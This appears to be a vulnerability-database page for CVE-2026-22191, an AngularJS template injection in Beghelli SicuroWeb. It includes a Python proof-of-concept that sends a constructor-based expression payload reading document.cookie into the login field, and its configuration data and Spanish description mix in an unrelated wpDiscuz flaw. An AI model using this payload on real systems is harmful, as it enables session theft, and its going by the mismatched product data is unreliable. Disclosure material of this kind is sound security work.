Security Vulnerability Report
CVE-2026-22191 CVSS 5.2 MEDIUM

CVE-2026-22191

Published: 2026-03-13 19:54:09
Last Modified: 2026-04-22 19:17:00

Description

Beghelli Sicuro24 SicuroWeb contains a template injection vulnerability that allows attackers to inject arbitrary AngularJS expressions by exploiting improper rendering of untrusted input in AngularJS template contexts. Attackers can inject malicious expressions that are compiled and executed by the AngularJS 1.5.2 runtime to achieve arbitrary JavaScript execution in operator browser sessions, with network-adjacent attackers able to deliver payloads via MITM injection in plaintext HTTP deployments.

CVSS Details

CVSS Score
5.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* - VULNERABLE (note: this CPE identifies the gvectors wpDiscuz WordPress plugin, not the Beghelli SicuroWeb product named in the description; the record's Spanish-language description in the raw JSON below likewise describes wpDiscuz before 7.6.47, so the configuration data appears to belong to a different record and should not be used for asset matching without checking the upstream entry)
Beghelli Sicuro24 SicuroWeb (AngularJS 1.5.2 runtime)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22191 PoC - AngularJS Template Injection # Target: Beghelli Sicuro24 SicuroWeb # CVSS: 5.2 (Medium) import requests TARGET = "http://target-ipv4/sicuroweb" # AngularJS template injection payload PAYLOAD = "{{constructor.constructor('alert(document.cookie)')()}}" def exploit(): # Try to inject AngularJS expression in vulnerable parameter # Common injection points: username, search, or any user-input field params = { "username": PAYLOAD, # or other injectable parameter "password": "test" } try: response = requests.post(TARGET + "/login", data=params, timeout=10) print(f"[*] Request sent to {TARGET}") print(f"[*] Payload: {PAYLOAD}") print(f"[*] Response status: {response.status_code}") # Check if payload is reflected in response if PAYLOAD in response.text or "alert" in response.text: print("[+] VULNERABLE: Payload reflected and may be executed") else: print("[-] No obvious reflection detected") except requests.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22191", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:09.290", "lastModified": "2026-04-22T19:17:00.040", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Beghelli Sicuro24 SicuroWeb contains a template injection vulnerability that allows attackers to inject arbitrary AngularJS expressions by exploiting improper rendering of untrusted input in AngularJS template contexts. Attackers can inject malicious expressions that are compiled and executed by the AngularJS 1.5.2 runtime to achieve arbitrary JavaScript execution in operator browser sessions, with network-adjacent attackers able to deliver payloads via MITM injection in plaintext HTTP deployments."}, {"lang": "es", "value": "wpDiscuz anterior a 7.6.47 contiene una vulnerabilidad de inyección de shortcode que permite a los atacantes ejecutar shortcodes arbitrarios incluyéndolos en el contenido de los comentarios enviados a través de notificaciones por correo electrónico. 
Los atacantes pueden inyectar shortcodes como [contact-form-7] o [user_meta] en los comentarios, los cuales se ejecutan en el servidor cuando la clase WpdiscuzHelperEmail procesa las notificaciones a través de do_shortcode() antes de wp_mail()."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.2, 
"baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.6.47", "matchCriteriaId": "A81F51B9-0C21-4F7E-876B-C09A66B9AE05"}]}]}], "references": [{"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-POC.py", "source": "[email protected]"}, {"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-SicuroWeb-ATI-chain.txt", "source": "[email protected]"}, {"url": "https://www.beghelli.it", "source": "[email protected]"}, {"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/beghelli-sicuro24-sicuroweb-angularjs-template-injection", "source": "[email protected]"}]}}